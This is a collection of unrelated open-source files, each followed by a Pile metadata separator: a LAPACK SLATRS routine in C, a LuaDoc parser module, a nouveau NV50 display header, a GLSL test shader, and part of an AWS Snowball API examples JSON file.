sumj = sdot_(&i__3, &a[j * a_dim1 + 1], &c__1, &x[1],
&c__1);
} else if (j < *n) {
i__3 = *n - j;
sumj = sdot_(&i__3, &a[j + 1 + j * a_dim1], &c__1, &x[
j + 1], &c__1);
}
} else {
/* Otherwise, use in-line code for the dot product. */
if (upper) {
i__3 = j - 1;
for (i__ = 1; i__ <= i__3; ++i__) {
sumj += a[i__ + j * a_dim1] * uscal * x[i__];
/* L110: */
}
} else if (j < *n) {
i__3 = *n;
for (i__ = j + 1; i__ <= i__3; ++i__) {
sumj += a[i__ + j * a_dim1] * uscal * x[i__];
/* L120: */
}
}
}
if (uscal == tscal) {
/* Compute x(j) := ( x(j) - sumj ) / A(j,j) if 1/A(j,j) */
/* was not used to scale the dotproduct. */
x[j] -= sumj;
xj = (r__1 = x[j], dabs(r__1));
if (nounit) {
tjjs = a[j + j * a_dim1] * tscal;
} else {
tjjs = tscal;
/* Unit diagonal and no scaling: skip the division. */
if (tscal == 1.f) {
goto L135;
}
}
/* Compute x(j) = x(j) / A(j,j), scaling if necessary. */
tjj = dabs(tjjs);
if (tjj > smlnum) {
/* abs(A(j,j)) > SMLNUM: */
if (tjj < 1.f) {
if (xj > tjj * bignum) {
/* Scale X by 1/abs(x(j)). */
rec = 1.f / xj;
sscal_(n, &rec, &x[1], &c__1);
*scale *= rec;
xmax *= rec;
}
}
x[j] /= tjjs;
} else if (tjj > 0.f) {
/* 0 < abs(A(j,j)) <= SMLNUM: */
if (xj > tjj * bignum) {
/* Scale x by (1/abs(x(j)))*abs(A(j,j))*BIGNUM. */
rec = tjj * bignum / xj;
sscal_(n, &rec, &x[1], &c__1);
*scale *= rec;
xmax *= rec;
}
x[j] /= tjjs;
} else {
/* A(j,j) = 0: Set x(1:n) = 0, x(j) = 1, and */
/* scale = 0, and compute a solution to A'*x = 0. */
i__3 = *n;
for (i__ = 1; i__ <= i__3; ++i__) {
x[i__] = 0.f;
/* L130: */
}
x[j] = 1.f;
*scale = 0.f;
xmax = 0.f;
}
L135:
;
} else {
/* Compute x(j) := x(j) / A(j,j) - sumj if the dot */
/* product has already been divided by 1/A(j,j). */
x[j] = x[j] / tjjs - sumj;
}
/* Computing MAX */
r__2 = xmax, r__3 = (r__1 = x[j], dabs(r__1));
xmax = dmax(r__2,r__3);
/* L140: */
}
}
/* Compensate SCALE for the TSCAL factor that was folded into the
diagonal divisions above. */
*scale /= tscal;
}
/* Scale the column norms by 1/TSCAL for return. */
if (tscal != 1.f) {
r__1 = 1.f / tscal;
sscal_(n, &r__1, &cnorm[1], &c__1);
}
return 0;
/* End of SLATRS */
} /* slatrs_ */
|
{
"pile_set_name": "Github"
}
|
-------------------------------------------------------------------------------
-- @release $Id: standard.lua,v 1.39 2007/12/21 17:50:48 tomas Exp $
-------------------------------------------------------------------------------
local assert, pairs, tostring, type = assert, pairs, tostring, type
local io = require "io"
local lfs = require "lfs"
local luadoc = require "luadoc"
local util = require "luadoc.util"
local tags = require "luadoc.taglet.standard.tags"
local string = require "string"
local table = require "table"
module 'luadoc.taglet.standard'
-------------------------------------------------------------------------------
-- Creates an iterator for an array base on a class type.
-- @param t array to iterate over
-- @param class name of the class to iterate over
-- Creates an iterator factory for an array based on a class type.
-- Calling the returned function yields a fresh iterator; each call of
-- that iterator returns the next element of `t' whose `class' field
-- matches, or nil when the array is exhausted.
-- @param t array to iterate over
-- @param class name of the class to iterate over
function class_iterator (t, class)
	return function ()
		local pos = 0
		return function ()
			repeat
				pos = pos + 1
			until t[pos] == nil or t[pos].class == class
			return t[pos]
		end
	end
end
-- Patterns for function recognition.
-- Each pattern yields three captures: a position (or the "local " prefix),
-- the function name, and the raw parameter list.
local identifiers_list_pattern = "%s*(.-)%s*"
local identifier_pattern = "[^%(%s]+"
local function_patterns = {
	-- "function name(args)"
	"^()%s*function%s*("..identifier_pattern..")%s*%("..identifiers_list_pattern.."%)",
	-- "local function name(args)"
	-- NOTE(review): `(local%s)' captures the trailing whitespace character,
	-- so the capture is "local " (with a space) — see check_function below.
	"^%s*(local%s)%s*function%s*("..identifier_pattern..")%s*%("..identifiers_list_pattern.."%)",
	-- "name = function(args)"
	"^()%s*("..identifier_pattern..")%s*%=%s*function%s*%("..identifiers_list_pattern.."%)",
}
-------------------------------------------------------------------------------
-- Checks if the line contains a function definition
-- @param line string with line text
-- @return function information or nil if no function definition found
-- Checks if the line contains a function definition.
-- @param line string with line text
-- @return table with `name', `private' and `param' fields, or nil if no
--         function definition was found
local function check_function (line)
	line = util.trim(line)
	local info
	-- table.foreachi is deprecated (removed in Lua 5.2); use a plain loop
	-- and stop at the first pattern that matches.
	for _, pattern in ipairs(function_patterns) do
		local r, _, l, id, param = string.find(line, pattern)
		if r ~= nil then
			info = {
				name = id,
				-- `l' is a position capture (number) for the non-local
				-- patterns and the "local " prefix (string, including the
				-- trailing space) for local functions.  The original test
				-- `l == "local"' could never match because of that space,
				-- so `private' was always false.
				private = (type(l) == "string" and util.trim(l) == "local"),
				param = util.split("%s*,%s*", param),
			}
			break
		end
	end
	-- TODO: remove these assert's?
	if info ~= nil then
		assert(info.name, "function name undefined")
		assert(info.param, string.format("undefined parameter list for function `%s'", info.name))
	end
	return info
end
-------------------------------------------------------------------------------
-- Checks if the line contains a module definition.
-- @param line string with line text
-- @param currentmodule module already found, if any
-- @return the name of the defined module, or nil if there is no module
-- definition
-- Checks if the line contains a module definition.
-- Recognized forms: module"x.y", module'x.y', module[[x.y]], the
-- parenthesised variants, and module(...).
-- @param line string with line text
-- @param currentmodule module already found, if any
-- @return name of the defined module, or `currentmodule' when the line
--         contains no module definition
local function check_module (line, currentmodule)
	line = util.trim(line)
	local start_pos, _, modulename = string.find(line, "^module%s*[%s\"'(%[]+([^,\"')%]]+)")
	if start_pos == nil then
		return currentmodule
	end
	-- found module definition
	logger:debug(string.format("found module `%s'", modulename))
	return modulename
end
-------------------------------------------------------------------------------
-- Extracts summary information from a description. The first sentence of each
-- doc comment should be a summary sentence, containing a concise but complete
-- description of the item. It is important to write crisp and informative
-- initial sentences that can stand on their own
-- @param description text with item description
-- @return summary string or nil if description is nil
-- Extracts summary information from a description: the text up to and
-- including the first period that is followed by whitespace.  If no such
-- sentence boundary exists, the whole description is the summary.
-- @param description text with item description (may be nil)
-- @return summary string (never nil; a trailing space is appended so the
--         sentence pattern also matches at end-of-text)
local function parse_summary (description)
	local text = (description or "") .. " "
	local first_sentence = string.match(text, "(.-%.)[%s\t]")
	return first_sentence or text
end
-------------------------------------------------------------------------------
-- @param f file handle
-- @param line current line being parsed
-- @param modulename module already found, if any
-- @return current line
-- @return code block
-- @return modulename if found
-- Reads plain (non-luadoc) code lines from `f' until the next luadoc
-- block (a line starting with ---) or end of file, collecting them and
-- watching for a module definition along the way.
-- @param f file handle
-- @param line current line being parsed
-- @param modulename module already found, if any
-- @return current line (the --- line, or nil at EOF)
-- @return array with the collected code lines
-- @return modulename if found
local function parse_code (f, line, modulename)
	local code = {}
	while line do
		if string.find(line, "^[\t ]*%-%-%-") then
			-- reached another luadoc block, end this parsing
			return line, code, modulename
		end
		-- look for a module definition
		modulename = check_module(line, modulename)
		code[#code + 1] = line
		line = f:read()
	end
	-- reached end of file
	return line, code, modulename
end
-------------------------------------------------------------------------------
-- Parses the information inside a block comment
-- @param block block with comment field
-- @return block parameter
-- Parses the information inside a block comment: classifies the block
-- (function/module), processes its @ tags, and fills in the summary.
-- @param block block with `comment' and `code' fields
-- @param first_line true when this is the first block of the file
-- @return the same block, annotated
local function parse_comment (block, first_line)
	-- get the first non-empty line of code
	-- (table.foreachi is deprecated and removed in Lua 5.2; the loops
	-- below replicate its "stop at first non-nil result" behaviour)
	local code
	for _, line in ipairs(block.code) do
		if not util.line_empty(line) then
			-- `local' declarations are ignored in two cases:
			-- when the `nolocals' option is turned on; and
			-- when the first block of a file is parsed (this is
			-- necessary to avoid confusion between the top
			-- local declarations and the `module' definition.
			local skip_local = (options.nolocals or first_line) and line:find"^%s*local"
			if not skip_local then
				code = line
				break
			end
		end
	end
	-- parse first line of code
	if code ~= nil then
		local func_info = check_function(code)
		local module_name = check_module(code)
		if func_info then
			block.class = "function"
			block.name = func_info.name
			block.param = func_info.param
			block.private = func_info.private
		elseif module_name then
			block.class = "module"
			block.name = module_name
			block.param = {}
		else
			block.param = {}
		end
	else
		-- TODO: comment without any code. Does this means we are dealing
		-- with a file comment?
	end
	-- parse @ tags; text before the first tag is the description
	local currenttag = "description"
	local currenttext
	for _, line in ipairs(block.comment) do
		line = util.trim_comment(line)
		local r, _, tag, text = string.find(line, "@([_%w%.]+)%s+(.*)")
		if r ~= nil then
			-- found new tag, add previous one, and start a new one
			-- TODO: what to do with invalid tags? issue an error? or log a warning?
			tags.handle(currenttag, block, currenttext)
			currenttag = tag
			currenttext = text
		else
			currenttext = util.concat(currenttext, line)
			assert(string.sub(currenttext, 1, 1) ~= " ", string.format("`%s', `%s'", currenttext, line))
		end
	end
	tags.handle(currenttag, block, currenttext)
	-- extracts summary information from the description
	block.summary = parse_summary(block.description)
	assert(string.sub(block.description, 1, 1) ~= " ", string.format("`%s'", block.description))
	return block
end
-------------------------------------------------------------------------------
-- Parses a block of comment, started with ---. Read until the next block of
-- comment.
-- @param f file handle
-- @param line being parsed
-- @param modulename module already found, if any
-- @return line
-- @return block parsed
-- @return modulename if found
-- Parses a block of comment, started with ---. Reads until the next
-- block of comment (or EOF), then parses the code below it.
-- @param f file handle
-- @param line being parsed
-- @param modulename module already found, if any
-- @param first true when this is the first block of the file
-- @return line
-- @return block parsed
-- @return modulename if found
local function parse_block (f, line, modulename, first)
	local block = { comment = {}, code = {} }
	while line ~= nil do
		local is_comment_line = string.find(line, "^[\t ]*%-%-") ~= nil
		if is_comment_line then
			table.insert(block.comment, line)
			line = f:read()
		else
			-- reached end of comment, read the code below it
			-- TODO: allow empty lines
			line, block.code, modulename = parse_code(f, line, modulename)
			-- parse information in block comment
			block = parse_comment(block, first)
			return line, block, modulename
		end
	end
	-- reached end of file; parse information in block comment
	block = parse_comment(block, first)
	return line, block, modulename
end
-------------------------------------------------------------------------------
-- Parses a file documented following luadoc format.
-- @param filepath full path of file to parse
-- @param doc table with documentation
-- @return table with documentation
-- Parses a file documented following luadoc format.
-- Collects all luadoc blocks, registers the file under doc.files, and --
-- when a module definition is found -- registers the blocks under
-- doc.modules as well.
-- @param filepath full path of file to parse
-- @param doc table with documentation
-- @return table with documentation
function parse_file (filepath, doc)
	local blocks = {}
	local modulename = nil
	-- read each line
	local f = io.open(filepath, "r")
	local i = 1
	local line = f:read()
	local first = true
	while line ~= nil do
		if string.find(line, "^[\t ]*%-%-%-") then
			-- reached a luadoc block
			local block
			line, block, modulename = parse_block(f, line, modulename, first)
			table.insert(blocks, block)
		else
			-- look for a module definition
			modulename = check_module(line, modulename)
			-- TODO: keep beginning of file somewhere
			line = f:read()
		end
		first = false
		i = i + 1
	end
	f:close()
	-- store blocks in file hierarchy
	assert(doc.files[filepath] == nil, string.format("doc for file `%s' already defined", filepath))
	table.insert(doc.files, filepath)
	doc.files[filepath] = {
		type = "file",
		name = filepath,
		doc = blocks,
		-- functions = class_iterator(blocks, "function"),
		-- tables = class_iterator(blocks, "table"),
	}
	-- copy file-level metadata from the first block, if a module was found
	local first = doc.files[filepath].doc[1]
	if first and modulename then
		doc.files[filepath].author = first.author
		doc.files[filepath].copyright = first.copyright
		doc.files[filepath].description = first.description
		doc.files[filepath].release = first.release
		doc.files[filepath].summary = first.summary
	end
	-- if module definition is found, store in module hierarchy
	if modulename ~= nil then
		if modulename == "..." then
			-- module(...) takes its name from the file path
			modulename = string.gsub (filepath, "%.lua$", "")
			modulename = string.gsub (modulename, "/", ".")
		end
		if doc.modules[modulename] ~= nil then
			-- module is already defined, just add the blocks
			table.foreachi(blocks, function (_, v)
				table.insert(doc.modules[modulename].doc, v)
			end)
		else
			-- TODO: put this in a different module
			table.insert(doc.modules, modulename)
			doc.modules[modulename] = {
				type = "module",
				name = modulename,
				doc = blocks,
				-- functions = class_iterator(blocks, "function"),
				-- tables = class_iterator(blocks, "table"),
				author = first and first.author,
				copyright = first and first.copyright,
				description = "",
				release = first and first.release,
				summary = "",
			}
			-- find module description
			for m in class_iterator(blocks, "module")() do
				doc.modules[modulename].description = util.concat(
					doc.modules[modulename].description,
					m.description)
				doc.modules[modulename].summary = util.concat(
					doc.modules[modulename].summary,
					m.summary)
				if m.author then
					doc.modules[modulename].author = m.author
				end
				if m.copyright then
					doc.modules[modulename].copyright = m.copyright
				end
				if m.release then
					doc.modules[modulename].release = m.release
				end
				if m.name then
					doc.modules[modulename].name = m.name
				end
			end
			-- NOTE(review): description/summary are initialized to "" above,
			-- which is truthy in Lua, so the `or' fallbacks below never fire
			-- -- presumably intended as a fallback to the first block; verify.
			doc.modules[modulename].description = doc.modules[modulename].description or (first and first.description) or ""
			doc.modules[modulename].summary = doc.modules[modulename].summary or (first and first.summary) or ""
		end
		-- make functions table
		doc.modules[modulename].functions = {}
		for f in class_iterator(blocks, "function")() do
			table.insert(doc.modules[modulename].functions, f.name)
			doc.modules[modulename].functions[f.name] = f
		end
		-- make tables table
		doc.modules[modulename].tables = {}
		for t in class_iterator(blocks, "table")() do
			table.insert(doc.modules[modulename].tables, t.name)
			doc.modules[modulename].tables[t.name] = t
		end
	end
	-- make functions table
	doc.files[filepath].functions = {}
	for f in class_iterator(blocks, "function")() do
		table.insert(doc.files[filepath].functions, f.name)
		doc.files[filepath].functions[f.name] = f
	end
	-- make tables table
	doc.files[filepath].tables = {}
	for t in class_iterator(blocks, "table")() do
		table.insert(doc.files[filepath].tables, t.name)
		doc.files[filepath].tables[t.name] = t
	end
	return doc
end
-------------------------------------------------------------------------------
-- Checks if the file is terminated by ".lua" or ".luadoc" and calls the
-- function that does the actual parsing
-- @param filepath full path of the file to parse
-- @param doc table with documentation
-- @return table with documentation
-- @see parse_file
-- Checks if the file is terminated by ".lua" or ".luadoc" and calls the
-- function that does the actual parsing.
-- @param filepath full path of the file to parse
-- @param doc table with documentation
-- @return table with documentation
-- @see parse_file
function file (filepath, doc)
	local patterns = { "%.lua$", "%.luadoc$" }
	-- table.foreachi is deprecated (removed in Lua 5.2); use a plain loop
	local valid = false
	for _, pattern in ipairs(patterns) do
		if string.find(filepath, pattern) ~= nil then
			valid = true
			break
		end
	end
	if valid then
		logger:info(string.format("processing file `%s'", filepath))
		doc = parse_file(filepath, doc)
	end
	return doc
end
-------------------------------------------------------------------------------
-- Recursively iterates through a directory, parsing each file
-- @param path directory to search
-- @param doc table with documentation
-- @return table with documentation
-- Recursively iterates through a directory, parsing each regular file
-- and descending into subdirectories (skipping "." and "..").
-- @param path directory to search
-- @param doc table with documentation
-- @return table with documentation
function directory (path, doc)
	for entry in lfs.dir(path) do
		local fullpath = path .. "/" .. entry
		local attr = lfs.attributes(fullpath)
		assert(attr, string.format("error stating file `%s'", fullpath))
		if attr.mode == "directory" then
			if entry ~= "." and entry ~= ".." then
				doc = directory(fullpath, doc)
			end
		elseif attr.mode == "file" then
			doc = file(fullpath, doc)
		end
	end
	return doc
end
-- Recursively sorts the documentation table
-- Recursively sorts the documentation table: the array part of `tab'
-- (names) alphabetically, plus each entry's `functions' and `tables'
-- name lists when present.
local function recsort (tab)
	table.sort (tab)
	-- sort list of functions/tables by name alphabetically
	for _, entry in pairs(tab) do
		if entry.functions then
			table.sort(entry.functions)
		end
		if entry.tables then
			table.sort(entry.tables)
		end
	end
end
-------------------------------------------------------------------------------
-- Entry point: processes a list of files and/or directories, producing
-- (or extending) a documentation table with sorted `files' and `modules'.
-- @param files array of paths to process
-- @param doc optional existing documentation table to extend
-- @return table with documentation
function start (files, doc)
	assert(files, "file list not specified")
	-- Create an empty document, or use the given one
	doc = doc or {
		files = {},
		modules = {},
	}
	assert(doc.files, "undefined `files' field")
	assert(doc.modules, "undefined `modules' field")
	-- table.foreachi is deprecated (removed in Lua 5.2); use a plain loop
	for _, path in ipairs(files) do
		local attr = lfs.attributes(path)
		assert(attr, string.format("error stating path `%s'", path))
		if attr.mode == "file" then
			doc = file(path, doc)
		elseif attr.mode == "directory" then
			doc = directory(path, doc)
		end
	end
	-- order arrays alphabetically
	recsort(doc.files)
	recsort(doc.modules)
	return doc
end
|
{
"pile_set_name": "Github"
}
|
#ifndef __NV50_KMS_HEAD_H__
#define __NV50_KMS_HEAD_H__
#define nv50_head(c) container_of((c), struct nv50_head, base.base)
#include "disp.h"
#include "atom.h"
#include "lut.h"
#include "nouveau_crtc.h"
/* Per-head (CRTC) state for NV50+ display; embeds the common nouveau CRTC. */
struct nv50_head {
	const struct nv50_head_func *func; /* hardware-generation op table (see below) */
	struct nouveau_crtc base;          /* embedded nouveau CRTC; nv50_head() macro recovers us from it */
	struct nv50_lut olut;              /* buffer for the head's olut — presumably the output LUT driven by the olut_* ops; confirm against lut.h */
};
int nv50_head_create(struct drm_device *, int index);
void nv50_head_flush_set(struct nv50_head *, struct nv50_head_atom *);
void nv50_head_flush_clr(struct nv50_head *, struct nv50_head_atom *, bool y);
/* Hardware-generation-specific operations for programming a display head.
 * Instances (head507d, head827d, head907d, ...) are selected per chipset;
 * *_set/*_clr pairs apparently program and disable a unit respectively —
 * verify against the implementations. */
struct nv50_head_func {
	void (*view)(struct nv50_head *, struct nv50_head_atom *);
	void (*mode)(struct nv50_head *, struct nv50_head_atom *);
	/* output LUT handling (olut field above) */
	void (*olut)(struct nv50_head *, struct nv50_head_atom *);
	void (*olut_set)(struct nv50_head *, struct nv50_head_atom *);
	void (*olut_clr)(struct nv50_head *);
	/* core channel configuration */
	void (*core_calc)(struct nv50_head *, struct nv50_head_atom *);
	void (*core_set)(struct nv50_head *, struct nv50_head_atom *);
	void (*core_clr)(struct nv50_head *);
	/* cursor: layout/format validation returns 0 or -errno (int) */
	int (*curs_layout)(struct nv50_head *, struct nv50_wndw_atom *,
			   struct nv50_head_atom *);
	int (*curs_format)(struct nv50_head *, struct nv50_wndw_atom *,
			   struct nv50_head_atom *);
	void (*curs_set)(struct nv50_head *, struct nv50_head_atom *);
	void (*curs_clr)(struct nv50_head *);
	/* base/overlay layer setup */
	void (*base)(struct nv50_head *, struct nv50_head_atom *);
	void (*ovly)(struct nv50_head *, struct nv50_head_atom *);
	void (*dither)(struct nv50_head *, struct nv50_head_atom *);
	void (*procamp)(struct nv50_head *, struct nv50_head_atom *);
	/* output resource (OR) configuration */
	void (*or)(struct nv50_head *, struct nv50_head_atom *);
};
extern const struct nv50_head_func head507d;
void head507d_view(struct nv50_head *, struct nv50_head_atom *);
void head507d_mode(struct nv50_head *, struct nv50_head_atom *);
void head507d_olut(struct nv50_head *, struct nv50_head_atom *);
void head507d_core_calc(struct nv50_head *, struct nv50_head_atom *);
void head507d_core_clr(struct nv50_head *);
int head507d_curs_layout(struct nv50_head *, struct nv50_wndw_atom *,
struct nv50_head_atom *);
int head507d_curs_format(struct nv50_head *, struct nv50_wndw_atom *,
struct nv50_head_atom *);
void head507d_base(struct nv50_head *, struct nv50_head_atom *);
void head507d_ovly(struct nv50_head *, struct nv50_head_atom *);
void head507d_dither(struct nv50_head *, struct nv50_head_atom *);
void head507d_procamp(struct nv50_head *, struct nv50_head_atom *);
extern const struct nv50_head_func head827d;
extern const struct nv50_head_func head907d;
void head907d_view(struct nv50_head *, struct nv50_head_atom *);
void head907d_mode(struct nv50_head *, struct nv50_head_atom *);
void head907d_olut(struct nv50_head *, struct nv50_head_atom *);
void head907d_olut_set(struct nv50_head *, struct nv50_head_atom *);
void head907d_olut_clr(struct nv50_head *);
void head907d_core_set(struct nv50_head *, struct nv50_head_atom *);
void head907d_core_clr(struct nv50_head *);
void head907d_curs_set(struct nv50_head *, struct nv50_head_atom *);
void head907d_curs_clr(struct nv50_head *);
void head907d_ovly(struct nv50_head *, struct nv50_head_atom *);
void head907d_procamp(struct nv50_head *, struct nv50_head_atom *);
void head907d_or(struct nv50_head *, struct nv50_head_atom *);
extern const struct nv50_head_func head917d;
int head917d_curs_layout(struct nv50_head *, struct nv50_wndw_atom *,
struct nv50_head_atom *);
extern const struct nv50_head_func headc37d;
#endif
|
{
"pile_set_name": "Github"
}
|
/*
** Copyright (c) 2012 The Khronos Group Inc.
**
** Permission is hereby granted, free of charge, to any person obtaining a
** copy of this software and/or associated documentation files (the
** "Materials"), to deal in the Materials without restriction, including
** without limitation the rights to use, copy, modify, merge, publish,
** distribute, sublicense, and/or sell copies of the Materials, and to
** permit persons to whom the Materials are furnished to do so, subject to
** the following conditions:
**
** The above copyright notice and this permission notice shall be included
** in all copies or substantial portions of the Materials.
**
** THE MATERIALS ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
** EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
** MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
** IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
** CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
** TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
** MATERIALS OR THE USE OR OTHER DEALINGS IN THE MATERIALS.
*/
attribute vec4 gtf_Color;
attribute vec4 gtf_Vertex;
uniform mat4 gtf_ModelViewProjectionMatrix;
varying vec4 color;

// Turns each input color channel into a boolean (values >= 2/3 become true,
// values < 2/3 become false), inverts it with not(), and emits the result as
// the varying color; the vertex position is transformed as usual.
void main (void)
{
	bvec3 flags = bvec3(floor(1.5 * gtf_Color.rgb)); // 1/3 true, 2/3 false
	color = vec4(vec3(not(flags)), 1.0);
	gl_Position = gtf_ModelViewProjectionMatrix * gtf_Vertex;
}
|
{
"pile_set_name": "Github"
}
|
{
"version": "1.0",
"examples": {
"CancelCluster": [
{
"input": {
"ClusterId": "CID123e4567-e89b-12d3-a456-426655440000"
},
"comments": {
},
"description": "This operation cancels a cluster job. You can only cancel a cluster job while it's in the AwaitingQuorum status.",
"id": "to-cancel-a-cluster-job-1482533760554",
"title": "To cancel a cluster job"
}
],
"CancelJob": [
{
"input": {
"JobId": "JID123e4567-e89b-12d3-a456-426655440000"
},
"comments": {
},
"description": "This operation cancels a job. You can only cancel a job before its JobState value changes to PreparingAppliance.",
"id": "to-cancel-a-job-for-a-snowball-device-1482534699477",
"title": "To cancel a job for a Snowball device"
}
],
"CreateAddress": [
{
"input": {
"Address": {
"City": "Seattle",
"Company": "My Company's Name",
"Country": "USA",
"Name": "My Name",
"PhoneNumber": "425-555-5555",
"PostalCode": "98101",
"StateOrProvince": "WA",
"Street1": "123 Main Street"
}
},
"output": {
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b"
},
"comments": {
},
"description": "This operation creates an address for a job. Addresses are validated at the time of creation. The address you provide must be located within the serviceable area of your region. If the address is invalid or unsupported, then an exception is thrown.",
"id": "to-create-an-address-for-a-job-1482535416294",
"title": "To create an address for a job"
}
],
"CreateCluster": [
{
"input": {
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b",
"Description": "MyCluster",
"JobType": "LOCAL_USE",
"KmsKeyARN": "arn:aws:kms:us-east-1:123456789012:key/abcd1234-12ab-34cd-56ef-123456123456",
"Notification": {
"JobStatesToNotify": [
],
"NotifyAll": false
},
"Resources": {
"S3Resources": [
{
"BucketArn": "arn:aws:s3:::MyBucket",
"KeyRange": {
}
}
]
},
"RoleARN": "arn:aws:iam::123456789012:role/snowball-import-S3-role",
"ShippingOption": "SECOND_DAY",
"SnowballType": "EDGE"
},
"output": {
"ClusterId": "CID123e4567-e89b-12d3-a456-426655440000"
},
"comments": {
},
"description": "Creates an empty cluster. Each cluster supports five nodes. You use the CreateJob action separately to create the jobs for each of these nodes. The cluster does not ship until these five node jobs have been created.",
"id": "to-create-a-cluster-1482864724077",
"title": "To create a cluster"
}
],
"CreateJob": [
{
"input": {
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b",
"Description": "My Job",
"JobType": "IMPORT",
"KmsKeyARN": "arn:aws:kms:us-east-1:123456789012:key/abcd1234-12ab-34cd-56ef-123456123456",
"Notification": {
"JobStatesToNotify": [
],
"NotifyAll": false
},
"Resources": {
"S3Resources": [
{
"BucketArn": "arn:aws:s3:::MyBucket",
"KeyRange": {
}
}
]
},
"RoleARN": "arn:aws:iam::123456789012:role/snowball-import-S3-role",
"ShippingOption": "SECOND_DAY",
"SnowballCapacityPreference": "T80",
"SnowballType": "STANDARD"
},
"output": {
"JobId": "JID123e4567-e89b-12d3-a456-426655440000"
},
"comments": {
},
"description": "Creates a job to import or export data between Amazon S3 and your on-premises data center. Your AWS account must have the right trust policies and permissions in place to create a job for Snowball. If you're creating a job for a node in a cluster, you only need to provide the clusterId value; the other job attributes are inherited from the cluster.",
"id": "to-create-a-job-1482864834886",
"title": "To create a job"
}
],
"DescribeAddress": [
{
"input": {
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b"
},
"output": {
"Address": {
"AddressId": "ADID5643ec50-3eec-4eb3-9be6-9374c10eb51b",
"City": "Seattle",
"Company": "My Company",
"Country": "US",
"Name": "My Name",
"PhoneNumber": "425-555-5555",
"PostalCode": "98101",
"StateOrProvince": "WA",
"Street1": "123 Main Street"
}
},
"comments": {
},
"description": "This operation describes an address for a job.",
"id": "to-describe-an-address-for-a-job-1482538608745",
"title": "To describe an address for a job"
}
],
"DescribeAddresses": [
{
"input": {
},
"output": {
"Addresses": [
{
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b",
"City": "Seattle",
"Company": "My Company",
"Country": "US",
"Name": "My Name",
"PhoneNumber": "425-555-5555",
"PostalCode": "98101",
"StateOrProvince": "WA",
"Street1": "123 Main Street"
}
]
},
"comments": {
},
"description": "This operation describes all the addresses that you've created for AWS Snowball. Calling this API in one of the US regions will return addresses from the list of all addresses associated with this account in all US regions.",
"id": "to-describe-all-the-addresses-youve-created-for-aws-snowball-1482538936603",
"title": "To describe all the addresses you've created for AWS Snowball"
}
],
"DescribeCluster": [
{
"input": {
"ClusterId": "CID123e4567-e89b-12d3-a456-426655440000"
},
"output": {
"ClusterMetadata": {
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b",
"ClusterId": "CID123e4567-e89b-12d3-a456-426655440000",
"ClusterState": "Pending",
"CreationDate": "1480475517.0",
"Description": "MyCluster",
"JobType": "LOCAL_USE",
"KmsKeyARN": "arn:aws:kms:us-east-1:123456789012:key/abcd1234-12ab-34cd-56ef-123456123456",
"Notification": {
"JobStatesToNotify": [
],
"NotifyAll": false
},
"Resources": {
"S3Resources": [
{
"BucketArn": "arn:aws:s3:::MyBucket",
"KeyRange": {
}
}
]
},
"RoleARN": "arn:aws:iam::123456789012:role/snowball-import-S3-role",
"ShippingOption": "SECOND_DAY"
}
},
"comments": {
},
"description": "Returns information about a specific cluster including shipping information, cluster status, and other important metadata.",
"id": "to-describe-a-cluster-1482864218396",
"title": "To describe a cluster"
}
],
"DescribeJob": [
{
"input": {
"JobId": "JID123e4567-e89b-12d3-a456-426655440000"
},
"output": {
"JobMetadata": {
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b",
"CreationDate": "1475626164",
"Description": "My Job",
"JobId": "JID123e4567-e89b-12d3-a456-426655440000",
"JobState": "New",
"JobType": "IMPORT",
"KmsKeyARN": "arn:aws:kms:us-east-1:123456789012:key/abcd1234-12ab-34cd-56ef-123456123456",
"Notification": {
"JobStatesToNotify": [
],
"NotifyAll": false
},
"Resources": {
"S3Resources": [
{
"BucketArn": "arn:aws:s3:::MyBucket",
"KeyRange": {
}
}
]
},
"RoleARN": "arn:aws:iam::123456789012:role/snowball-import-S3-role",
"ShippingDetails": {
"ShippingOption": "SECOND_DAY"
},
"SnowballCapacityPreference": "T80",
"SnowballType": "STANDARD"
}
},
"comments": {
},
"description": "This operation describes a job you've created for AWS Snowball.",
"id": "to-describe-a-job-youve-created-for-aws-snowball-1482539500180",
"title": "To describe a job you've created for AWS Snowball"
}
],
"GetJobManifest": [
{
"input": {
"JobId": "JID123e4567-e89b-12d3-a456-426655440000"
},
"output": {
"ManifestURI": "https://awsie-frosty-manifests-prod.s3.amazonaws.com/JID123e4567-e89b-12d3-a456-426655440000_manifest.bin?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20161224T005115Z&X-Amz-SignedHeaders=..."
},
"comments": {
},
"description": "Returns a link to an Amazon S3 presigned URL for the manifest file associated with the specified JobId value. You can access the manifest file for up to 60 minutes after this request has been made. To access the manifest file after 60 minutes have passed, you'll have to make another call to the GetJobManifest action.\n\nThe manifest is an encrypted file that you can download after your job enters the WithCustomer status. The manifest is decrypted by using the UnlockCode code value, when you pass both values to the Snowball through the Snowball client when the client is started for the first time.\n\nAs a best practice, we recommend that you don't save a copy of an UnlockCode value in the same location as the manifest file for that job. Saving these separately helps prevent unauthorized parties from gaining access to the Snowball associated with that job.\n\nThe credentials of a given job, including its manifest file and unlock code, expire 90 days after the job is created.",
"id": "to-get-the-manifest-for-a-job-youve-created-for-aws-snowball-1482540389246",
"title": "To get the manifest for a job you've created for AWS Snowball"
}
],
"GetJobUnlockCode": [
{
"input": {
"JobId": "JID123e4567-e89b-12d3-a456-426655440000"
},
"output": {
"UnlockCode": "12345-abcde-56789-fghij-01234"
},
"comments": {
},
